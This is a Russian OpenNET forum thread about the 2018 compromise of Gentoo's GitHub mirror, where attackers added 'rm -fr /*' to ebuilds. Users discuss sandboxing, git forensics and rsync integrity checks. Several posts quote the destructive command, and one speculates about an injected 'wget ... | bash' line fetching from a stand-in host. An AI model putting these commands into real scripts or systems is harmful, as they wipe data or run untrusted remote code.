The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]



"Взломана инфраструктура проекта Gentoo на GitHub"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от opennews (??), 29-Июн-18, 09:20 
28 июня приблизительно в 20:20 UTC неустановленные лица получили (https://www.gentoo.org/news/2018/06/28/Github-gentoo-org-hac...) контроль над GitHub инфраструктурой проекта Gentoo и изменили содержимое репозиториев и некоторых страниц. Разработчики и мейнтейнеры пока работают над определением масштаба внесённых изменений и над возвращением контроля на репозиториями. Один из коммитов, добавленный злоумышленниками, добавлял во все ебилды команду "rm -fr /*".  


Весь код проекта, размещённый на GitHub, на данный момент может считаться скомпрометированным, но это не касается кода, размещённого на собственной инфраструктуре проекта Gentoo. GitHub использовался лишь для зеркалирования, а первичная разработка велась на собственных серверах, таким образом допускается использовать rsync или webrsync с gentoo.org. Все коммиты были подписаны, поэтому при использовании git следует обращать на эти подписи внимание.

Утром (04:26 UTC) контроль за репозиториями Gentoo в GitHub был восстановлен и в настоящее время совместно с сотрудниками GitHub проводится разбор инцидента и восстановление данных. При этом использовать код Gentoo на GitHub всё ещё не рекомендуется.


URL: https://archives.gentoo.org/gentoo-announce/message/dc23d48d...
Новость: https://www.opennet.ru/opennews/art.shtml?num=48870

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Взломана инфраструктура проекта Gentoo на GitHub"  +21 +/
Сообщение от Аноним (1), 29-Июн-18, 09:20 
Стоило, значит, продаться, и вот...
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

7. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от Аноним (7), 29-Июн-18, 09:34 
https://www.opennet.ru/opennews/art.shtml?num=48715
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

2. "Взломана инфраструктура проекта Gentoo на GitHub"  +6 +/
Сообщение от Аноним (2), 29-Июн-18, 09:24 
Граждане храните свой код в gitlab кассе..., если конечно он у вас есть...
Где-то примерно так получается
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

46. "Взломана инфраструктура проекта Gentoo на GitHub"  +4 +/
Сообщение от Аноним (46), 29-Июн-18, 11:36 
Угу, можно подумать GitLab не взламывали.

Граждане, храните ваш код на собственном сервре с какой-нибудь Gitea мордой!

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

50. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от utoplenick (ok), 29-Июн-18, 12:18 
gitlab можно и на свой сервер поставить
Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

52. "Взломана инфраструктура проекта Gentoo на GitHub"  +5 +/
Сообщение от Аноним (52), 29-Июн-18, 12:54 
чтобы его там взломали
Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

78. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Аноним (78), 29-Июн-18, 18:09 
А мне BitBucket больше нравится
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

84. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Инсайдер (?), 29-Июн-18, 23:43 
"У богатых свои причуды".
https://cdn.fishki.net/upload/post/2018/04/06/2561237/tn/4-0...
Ответить | Правка | ^ к родителю #78 | Наверх | Cообщить модератору

93. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от ptremail (??), 30-Июн-18, 11:02 
> Граждане храните свой код в gitlab

Свой код храним в SVN. Сборка по трекингу коммитов в Redmine. Ничего не имею против GIT, но для совего кода, а не комьюнити, централизированный SVN однозначно надежней.

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

3. "Взломана инфраструктура проекта Gentoo на GitHub"  +2 +/
Сообщение от Аноним (-), 29-Июн-18, 09:25 
После известных событий, Github открыл охоту на опенсорс.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

6. "Взломана инфраструктура проекта Gentoo на GitHub"  +2 +/
Сообщение от An (??), 29-Июн-18, 09:33 
> во все ебилды команду "rm -fr /*"

Ребята не мелочатся

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

8. "Взломана инфраструктура проекта Gentoo на GitHub"  +12 +/
Сообщение от A.Stahl (ok), 29-Июн-18, 09:36 
Есть ничем не потверждённое мнение, что этот коммит сделан для отвода глаз, чтобы всё выглядело как баловство кали-детишек. А настоящая цель взлома запрятана куда хитрее.
Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

10. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Anoemail (?), 29-Июн-18, 09:43 
Очень может даже быть
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

11. "Взломана инфраструктура проекта Gentoo на GitHub"  +5 +/
Сообщение от kvaps (ok), 29-Июн-18, 09:56 
Я вот не понимаю это же гит, он и запушить то не даст если дерево хоть как то изменилось.
Ну и если этот репо просто зеркало, то неужели не достаточно diff с оригинальным репозиторием сделать, тогда точно все изменения отобразятся.
Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

18. "Взломана инфраструктура проекта Gentoo на GitHub"  +5 +/
Сообщение от Аноним (-), 29-Июн-18, 10:13 
> Я вот не понимаю

А ты попробуй пойми. Не всё лежит на поверхности. Ведь главное - это не статичная картина последствий, diff сделают, не волнуйся. А интервал компрометации сервера, когда зловредный код распространяется, вероятно, тразитом, на разный узлы.

Какир добавляет "wget -O - http://hack.all | bash" в код ебилдов. Какое-то количество хостов заражены и начинают творить дела. Какир ребейзит, заменяет wget-коммит на хулиганский "rm -rf", делает housekeeping на сервере, еще какие-нибудь манипуляции, и, вероятно, в репах не остается следов первоначальной деятельности.

Куча вариантов

Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

85. "Взломана инфраструктура проекта Gentoo на GitHub"  –2 +/
Сообщение от Michael Shigorinemail (ok), 30-Июн-18, 00:01 
> Какир ребейзит, заменяет wget-коммит на хулиганский "rm -rf", делает
> housekeeping на сервере, еще какие-нибудь манипуляции, и, вероятно,
> в репах не остается следов первоначальной деятельности.

Сломав rebase -i и не сделав заранее старый добрый тарбол, засаживаюсь смотреть git reflog -- там следов есть.

Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

99. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от anonymous (??), 30-Июн-18, 20:49 
Я тоже всегда ищу под фонарем. Там светлее.
Ответить | Правка | ^ к родителю #85 | Наверх | Cообщить модератору

112. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Аноним (112), 28-Ноя-18, 19:40 
reflog - это локальная штука, reflog какира посмотреть не получится
Ответить | Правка | ^ к родителю #85 | Наверх | Cообщить модератору

23. "Взломана инфраструктура проекта Gentoo на GitHub"  +3 +/
Сообщение от Юрийemail (??), 29-Июн-18, 10:27 
Зачем вообще diff делать, залейте по новому свежую ветку и всё!!!
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

33. "Взломана инфраструктура проекта Gentoo на GitHub"  +3 +/
Сообщение от A.Stahl (ok), 29-Июн-18, 10:45 
Видимо есть желание не просто восстановить инфраструктуру, но и разобраться в причинах ситуации и в целях злоумышленников.
Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

35. "Взломана инфраструктура проекта Gentoo на GitHub"  +3 +/
Сообщение от Юрийemail (??), 29-Июн-18, 10:51 
> Видимо есть желание не просто восстановить инфраструктуру, но и разобраться в причинах
> ситуации и в целях злоумышленников.

Залить рабочую на гит, а копию повреждённой потом изучай.

Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

64. "Взломана инфраструктура проекта Gentoo на GitHub"  +2 +/
Сообщение от Аноним (64), 29-Июн-18, 14:41 
> он и запушить то не даст если дерево хоть как то изменилось

На жидхабе можно включить перезапись коммитов и сделать git push --force ;)

Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

104. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Наркоманка (?), 02-Июл-18, 16:48 
Да все ок там. Просто ради прикола пару echo добавили тут и там. Рекомендую загрузить и самим посмотреть через выполнение кода
Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

20. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Аноним (20), 29-Июн-18, 10:21 
Эта репа на гитхабе была исключительно для приёма pull-реквестов, причем PR-ы нельзя было мержить через гитхаб - изменения пропадали при следующем синке репы. :)

PS. Правда помимо дерева ебилдов на аккаунте были еще какие-то репозитории, но навскидку даже не вспомню какие.

Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

22. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Аноним (22), 29-Июн-18, 10:24 
...и какая же?...
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

28. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Crazy Alex (ok), 29-Июн-18, 10:37 
Там же подписи, ничего не спрячешь
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

15. "Взломана инфраструктура проекта Gentoo на GitHub"  +8 +/
Сообщение от dksbmjdrh (?), 29-Июн-18, 10:08 
точно микрософт!
линуксоиды не забыли бы добавить --no-preserve-root
Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

27. "Взломана инфраструктура проекта Gentoo на GitHub"  +4 +/
Сообщение от Аноним (27), 29-Июн-18, 10:36 
--no-preserve-root не нужен при удалении всех файдов без самого корня (/*).
Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

19. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от Внимательно читающий (?), 29-Июн-18, 10:20 
И это в ебилдах работает? Топорно, глупо и по-детски. Добавили бы хоть что-то вредное в цель. Может тогда у вредителей стала видна капля интелекта. А так - безумные вандалы.
Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

32. "Взломана инфраструктура проекта Gentoo на GitHub"  +3 +/
Сообщение от nrndda (ok), 29-Июн-18, 10:45 
Это сработает, если стоит nosandbox в make.conf, что не так по умолчанию, а так же если кто-то ставит ебилды ручками из-под рута "ebuild *.ebuild merge". В остальных случаях подобные ебилды тупо удалят старые файлы и не поставят ничего, либо вообще свалятся на стадии install с ошибкой sandbox violation. Даже нормальные ебилды порой поставить нельзя, если какой-то код хочет что-то прочитать из /.
Так что делал либо дилетант, либо наоборот знающий, но не желающий нанести реального вреда.
Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

40. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от Аноним (20), 29-Июн-18, 10:59 
Тут смотря в какую фазу был добавлен rm -rf /. В фазах pkg_* (например pkg_postinst) оно бы сработало.
Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

43. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Внимательно читающий (?), 29-Июн-18, 11:24 
Эти ...гм... вставили первой строкой в каждый ебилд.
Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

48. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Аноним (20), 29-Июн-18, 11:50 
Тогда код по идее тоже должен выполниться от рута и без песочницы. Но надо проверять.
Ответить | Правка | ^ к родителю #43 | Наверх | Cообщить модератору

70. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от J.L. (?), 29-Июн-18, 15:21 
> Тогда код по идее тоже должен выполниться от рута и без песочницы.
> Но надо проверять.

//очередное напоминание линуксойдам
как там доверие к репозиториям поживает? пакеты всё ещё правильно ставить от рута и запускать прост/пред-инстал скрипты?

Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

71. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от Аноним (71), 29-Июн-18, 15:48 
>> Тогда код по идее тоже должен выполниться от рута и без песочницы.
>> Но надо проверять.
> //очередное напоминание линуксойдам
> как там доверие к репозиториям поживает? пакеты всё ещё правильно ставить от
> рута и запускать прост/пред-инстал скрипты?

Но ведь репозитории как раз и не пострадали.

Ответить | Правка | ^ к родителю #70 | Наверх | Cообщить модератору

72. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от J.L. (?), 29-Июн-18, 15:56 
>>> Тогда код по идее тоже должен выполниться от рута и без песочницы.
>>> Но надо проверять.
>> //очередное напоминание линуксойдам
>> как там доверие к репозиториям поживает? пакеты всё ещё правильно ставить от
>> рута и запускать прост/пред-инстал скрипты?
> Но ведь репозитории как раз и не пострадали.

везение или недосмотр?

Ответить | Правка | ^ к родителю #71 | Наверх | Cообщить модератору

86. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от Michael Shigorinemail (ok), 30-Июн-18, 00:02 
>>> как там доверие к репозиториям поживает?
>> Но ведь репозитории как раз и не пострадали.
> везение или недосмотр?

Непонимание разницы между первоисточником и зеркалом, соответственно и между их копрометацией.  А везением это считать или недосмотром, разберитесь сами...

Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

98. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от J.L. (?), 30-Июн-18, 13:53 
>>>> как там доверие к репозиториям поживает?
>>> Но ведь репозитории как раз и не пострадали.
>> везение или недосмотр?
> Непонимание разницы между первоисточником и зеркалом, соответственно и между их копрометацией.
>  А везением это считать или недосмотром, разберитесь сами...

тоесть то, что тому админу после поблочили учётки на всех серверах вы считаете перестраховкой и так как это было "всего лишь зеркало, да и вообще девелоперское" - первоисточники неприкосновенны?

Ответить | Правка | ^ к родителю #86 | Наверх | Cообщить модератору

92. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от слакварщик (?), 30-Июн-18, 10:59 
>> Тогда код по идее тоже должен выполниться от рута и без песочницы.
>> Но надо проверять.
> //очередное напоминание линуксойдам
> как там доверие к репозиториям поживает? пакеты всё ещё правильно ставить от
> рута и запускать прост/пред-инстал скрипты?

Ты умееешь ставить пакеты в / не от рута ? :))) Или у тебя пакеты=тарболлы?

Ответить | Правка | ^ к родителю #70 | Наверх | Cообщить модератору

96. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от J.L. (?), 30-Июн-18, 13:40 
> Ты умееешь ставить пакеты в / не от рута ? :))) Или у тебя пакеты=тарболлы?

чисто из любопытства а зачем вам firefox в руте?

Ответить | Правка | ^ к родителю #92 | Наверх | Cообщить модератору

97. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от J.L. (?), 30-Июн-18, 13:45 
>> Ты умееешь ставить пакеты в / не от рута ? :))) Или у тебя пакеты=тарболлы?
> чисто из любопытства а зачем вам firefox в руте?

nix например умеет ставить не в рут

но пока инструкция установки для линукса будет такая - какая разница куда ставятся пакеты???

wget https://dist.ipfs.io/go-ipfs/v0.4.13/go-ipfs_v0.4.13_linux-a...
tar xvf go-ipfs_v0.4.13_linux-amd64.tar.gz
cd go-ifps
sudo ./install.sh

зы: раздел "инсталяция на линукс":
Install prebuilt packages
We host prebuilt binaries over at our distributions page.

From there:
Click the blue "Download go-ipfs" on the right side of the page.
Open/extract the archive.
Move ipfs to your path (install.sh can do it for you).

From Linux package managers
Arch Linux
Nix
Snap

//недоотправилось раньше

Ответить | Правка | ^ к родителю #96 | Наверх | Cообщить модератору

108. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от нах (?), 03-Июл-18, 14:48 
хотя бы банально для того, чтобы не каждый, вызвавший в нем remote code exec, мог заодно попатчить его бинарник (или скрипты), расположившись внутри всерьез и надолго.

чисто из любопытства - зачем вам вообще какое-то разделение пользователей, если вы живете во времена ms-dos - "все в хомяк!" ?

Ответить | Правка | ^ к родителю #96 | Наверх | Cообщить модератору

111. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от JL2001 (ok), 10-Июл-18, 09:42 
> хотя бы банально для того, чтобы не каждый, вызвавший в нем remote
> code exec, мог заодно попатчить его бинарник (или скрипты), расположившись внутри
> всерьез и надолго.
> чисто из любопытства - зачем вам вообще какое-то разделение пользователей, если вы
> живете во времена ms-dos - "все в хомяк!" ?

я не живу "всё в хомяк", и фокс от другого юзера
но в пакетной системе при установке точно скрипты запускать от рута не стоит, как и разворачивать пакет сразу на файловую систему без верификации чего он там поназапишет

Ответить | Правка | ^ к родителю #108 | Наверх | Cообщить модератору

9. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Gentoo Developer (?), 29-Июн-18, 09:38 
Сатанизм какой-то. Оставьте нас в покое. У нас и так мало времени, еще и гитхаб восстанавливать.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

14. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от Аноним (-), 29-Июн-18, 10:04 
Очередное напомниание о том, что "безопасность" - это не просто фантом. Мы не должны это забывать.

Например, есть люди, говорящие, мол меня не парят уязвимости Spectre, у меня доверенные вычисления на сервере, мне нечего терять. Но это порочная практика. Никогда не знаешь, куда всё это выльется.

Еще, например, есть люди, умелые разработчики, которые до сих пор борятся с банальным ssh-доступом - вводят короткие пароли, использует одни и те же из них в разных хостах. Надо такое исправлять, и помогать, и наказывать.

Да куча примеров. Вплоть до хранения паролей в непроверенных приложениях на мобилках, которые с радостью все эти данные утаскивают непонятно куда.

Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

31. "Взломана инфраструктура проекта Gentoo на GitHub"  +4 +/
Сообщение от Crazy Alex (ok), 29-Июн-18, 10:41 
Наоборот - надо чётко понимать, от чего именно прикрываешься, и использовать соответствующие меры. Иначе можно сразу компьютер разносить молотком (и сжечь для надёжности), чтобы уж точно ничего не утекло
Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

41. "Взломана инфраструктура проекта Gentoo на GitHub"  +2 +/
Сообщение от Аноним (-), 29-Июн-18, 11:09 
> надо чётко понимать, от чего именно прикрываешься

Это да, +1

Затягивание гаек по безопасности там, где не требуется, наносит удар по этой безопасности.

Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

25. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Внимательно читающий (?), 29-Июн-18, 10:29 
Да, так мало времени, что в новости не стали указывать о блокировании аккаунтов? Это какой надо было получить доступ чтобы такие действия провести?
Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

13. "Взломана инфраструктура проекта Gentoo на GitHub"  –2 +/
Сообщение от Аноним (13), 29-Июн-18, 10:03 
>это не касается кода, размещённого на собственной инфраструктуре проекта Gentoo.

А пруф будет? Ведь если это перепивший админ или злоумышленник, завладевший паролем админа, напр. с помощью трояна, то он может и там навредить.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

63. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от Аноним (63), 29-Июн-18, 14:41 
Админа, чей пароль утёк, уже установили и заблокировали.
Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

21. "Взломана инфраструктура проекта Gentoo на GitHub"  +3 +/
Сообщение от Клыкастый (ok), 29-Июн-18, 10:22 
некоторое время ебилдов не ждите
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

24. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Аноним (20), 29-Июн-18, 10:28 
> некоторое время ебилдов не ждите

Да ну?
https://gitweb.gentoo.org/repo/gentoo.git/

Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

57. "Взломана инфраструктура проекта Gentoo на GitHub"  +3 +/
Сообщение от Клыкастый (ok), 29-Июн-18, 13:51 
(насыпает Анониму горсть чувства юмора)
Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

29. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Анонимист (?), 29-Июн-18, 10:39 
Нельзя не ждать ебилдов. В этом смысл жызни.
Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

58. "Взломана инфраструктура проекта Gentoo на GitHub"  +5 +/
Сообщение от Клыкастый (ok), 29-Июн-18, 13:55 
> Нельзя не ждать ебилдов. В этом смысл жызни.

Мы не можем ждать ебилдов от мейнтейнеров. Написать их - наша задача. (В.И.Ленин)


Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

30. "Взломана инфраструктура проекта Gentoo на GitHub"  –2 +/
Сообщение от Аноним (30), 29-Июн-18, 10:40 
Началось. Ждем ответного удара по ауру.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

34. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Crazy Alex (ok), 29-Июн-18, 10:46 
Кстати, я вчера с гитхаба обновлял ебилды существенно раньше 20:00 UTC, и прилетела неожиданно большая гора обновлений - что-то около 30 метров качало, 140000 объектов. Надо хоть глянуть, что ли...
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

45. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Внимательно читающий (?), 29-Июн-18, 11:29 
Но в тот момент это не вызывало особых подозрений?
Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

88. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Crazy Alex (ok), 30-Июн-18, 00:43 
Вызвало, так что обновляться не стал, решил посмотреть поподробнее, когда будет время. А потом пришло письмо о взломе.
Ответить | Правка | ^ к родителю #45 | Наверх | Cообщить модератору

68. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от yep (?), 29-Июн-18, 15:11 
> Кстати, я вчера с гитхаба обновлял ебилды существенно раньше 20:00 UTC, и
> прилетела неожиданно большая гора обновлений - что-то около 30 метров качало,
> 140000 объектов. Надо хоть глянуть, что ли...

Зачем ты обновлял ebuild'ы  c репозитория для разработки? Он не предназначен для обновления с него.

Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

80. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от A (?), 29-Июн-18, 20:51 
Обновления ради разработки. Не?
Ответить | Правка | ^ к родителю #68 | Наверх | Cообщить модератору

81. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от yep (?), 29-Июн-18, 20:58 
> Обновления ради разработки. Не?

Ты с них систему обновляешь? Не надо так делать. Этот реп не для обновления дерева.

Ответить | Правка | ^ к родителю #80 | Наверх | Cообщить модератору

89. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Crazy Alex (ok), 30-Июн-18, 00:45 
Проверил - нет, не настолько плох, обновлялся с https://github.com/gentoo-mirror/gentoo - но тогда не особо понятно, откуда такой объём. Буду глядеть.
Ответить | Правка | ^ к родителю #68 | Наверх | Cообщить модератору

90. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от yep (?), 30-Июн-18, 02:09 
я пока на всякий случай на обновления через rsync вернулся,

а насчёт многих обновлений, глянь, может это из-за того, что python_targets_python3_6 для кучи пакетов добавили

Ответить | Правка | ^ к родителю #89 | Наверх | Cообщить модератору

91. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от yep (?), 30-Июн-18, 09:28 
https://www.gentoo.org/news/2018/06/28/Github-gentoo-org-hac...

тут ещё раз подтверждают, что gentoo-mirror не был подвержен аьаке

Ответить | Правка | ^ к родителю #89 | Наверх | Cообщить модератору

37. "Взломана инфраструктура проекта Gentoo на GitHub"  +4 +/
Сообщение от шутник (?), 29-Июн-18, 10:55 
Насамом деле, мелкософт действительно хотел лишь помочь, но что-то пошло не так.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

42. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от Аноним (42), 29-Июн-18, 11:10 
А получилось как всегда?
Ответить | Правка | ^ к родителю #37 | Наверх | Cообщить модератору

49. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от шутник (?), 29-Июн-18, 12:17 
>А получилось как всегда?

Да (загадочно подмигивая, опустив при этом голову).

Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

47. "Взломана инфраструктура проекта Gentoo на GitHub"  +8 +/
Сообщение от 1 (??), 29-Июн-18, 11:36 
там просто после rm -rf /* был запуск установщика 10-чки ...
Но setup.exe не запустился без wine
Ответить | Правка | ^ к родителю #37 | Наверх | Cообщить модератору

53. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от danonimous (?), 29-Июн-18, 13:15 
Жесть, вообще. Как раз читаю уже несколько дней Gentoo Handbook, собираюсь накатить на сервер с коллекцией моих фотографий и других файлов, накопленных за всю жизнь.
Вот где rm /* -rf натворило бы дел!
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

56. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Аноним (56), 29-Июн-18, 13:39 
При установке gentoo по handbook скомпрометированные ебилды с жидхаба в систему бы не попали: жидхабовские репозитории при этом никак не используются.

Но при установке по хендбуку есть более серьёзные проблемы: ебилды синхронизируются по незащищённому протоколу и без проверки целостности, что позволяет их незаметно подменять на любом зеркале. Разработчики давно в курсе, но молчат.
https://wiki.gentoo.org/wiki/Handbook_Talk:AMD64/Installatio...

Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

59. "Взломана инфраструктура проекта Gentoo на GitHub"  +2 +/
Сообщение от Аноним (59), 29-Июн-18, 14:05 
> ебилды синхронизируются по незащищённому протоколу и без проверки целостности

Это уже неактуальная информация. При синхронизации через rsync проверка целостности сейчас производится по умолчанию.

Ответить | Правка | ^ к родителю #56 | Наверх | Cообщить модератору

73. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от Аноним (56), 29-Июн-18, 16:01 
> При синхронизации через rsync проверка целостности сейчас производится по умолчанию.

Каким образом? Только что распаковал последний стаж, там sys-apps/portage собран без флага rsync-verify, а gemato, gpg и публичные ключи репозиториев отсутствуют.

Проверка по умолчанию производилась с 2018-01-30 по 2018-03-13, после чего из-за выявленных проблем была отключена, см. eselect news list и https://bugs.gentoo.org/650144.

Ответить | Правка | ^ к родителю #59 | Наверх | Cообщить модератору

76. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Аноним (59), 29-Июн-18, 16:43 
> Каким образом? Только что распаковал последний стаж, там sys-apps/portage собран без флага rsync-verify, а gemato, gpg и публичные ключи репозиториев отсутствуют.

Ха! А стейджи действительно собраны без rsync-verify.

$ tar xOf stage3-amd64-20180624T214502Z.tar.xz ./var/db/pkg/sys-apps/portage-2.3.40-r1/USE
abi_x86_64 amd64 elibc_glibc ipc kernel_linux native-extensions python_targets_python2_7 python_targets_python3_5 userland_GNU xattr

> Проверка по умолчанию производилась с 2018-01-30 по 2018-03-13, после чего из-за выявленных проблем была отключена, см. eselect news list и https://bugs.gentoo.org/650144.

Они её уже включили обратно, но стейджи почему-то до сих пор собирают без rsync-verify.

Ответить | Правка | ^ к родителю #73 | Наверх | Cообщить модератору

82. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от gentoo (?), 29-Июн-18, 22:07 
мы пятнадцать лет так собирали, и так раздавали, проверками озаботились вот, на днях - и ничего, вас это не беспокоило. Стоило откатить ненадолго неудачный патч - а-а-а, хулиганы байтиков лишают...или добавляют, не суть.

Ответить | Правка | ^ к родителю #76 | Наверх | Cообщить модератору

94. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от слакварщик (?), 30-Июн-18, 11:14 
>> ебилды синхронизируются по незащищённому протоколу и без проверки целостности
> Это уже неактуальная информация. При синхронизации через rsync проверка целостности сейчас
> производится по умолчанию.

Не синхронизируй их при установке ;)

Ответить | Правка | ^ к родителю #59 | Наверх | Cообщить модератору

101. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от yep (?), 02-Июл-18, 02:17 
>> ебилды синхронизируются по незащищённому протоколу и без проверки целостности
> Это уже неактуальная информация. При синхронизации через rsync проверка целостности сейчас
> производится по умолчанию.

У меня она второй день при обновлении через rsync не проходит, обязательно для какого-то ebuild контрольная сумма не совпадёт. Но такое бывало и раньше изредка.

Ответить | Правка | ^ к родителю #59 | Наверх | Cообщить модератору

109. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от SysA (?), 03-Июл-18, 17:41 
>>> ебилды синхронизируются по незащищённому протоколу и без проверки целостности
>> Это уже неактуальная информация. При синхронизации через rsync проверка целостности сейчас
>> производится по умолчанию.
> У меня она второй день при обновлении через rsync не проходит, обязательно
> для какого-то ebuild контрольная сумма не совпадёт. Но такое бывало и
> раньше изредка.

Это бывает, когда напоролся на параллельное обновление. В таком случае надо повторить синхронизацию. Если же это не помогает - тогда разбираться!

Ответить | Правка | ^ к родителю #101 | Наверх | Cообщить модератору

65. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от danonimous (?), 29-Июн-18, 14:47 
Написано, что github использовался также для зеркалирования - это что имеется в виду?
Gentoo же при соответсвующей настройке может синхронизировать репозиторий не с главного сервера, а с одного из зеркал.

В любом случае ещё не до конца понятен масштаб бедствия, если злоумышленник из бывших разработчиков, то и основные сервера могут иметь необнаруженные взломы.

Ответить | Правка | ^ к родителю #56 | Наверх | Cообщить модератору

69. "Взломана инфраструктура проекта Gentoo на GitHub"  +4 +/
Сообщение от yep (?), 29-Июн-18, 15:18 
> Написано, что github использовался также для зеркалирования - это что имеется в
> виду?

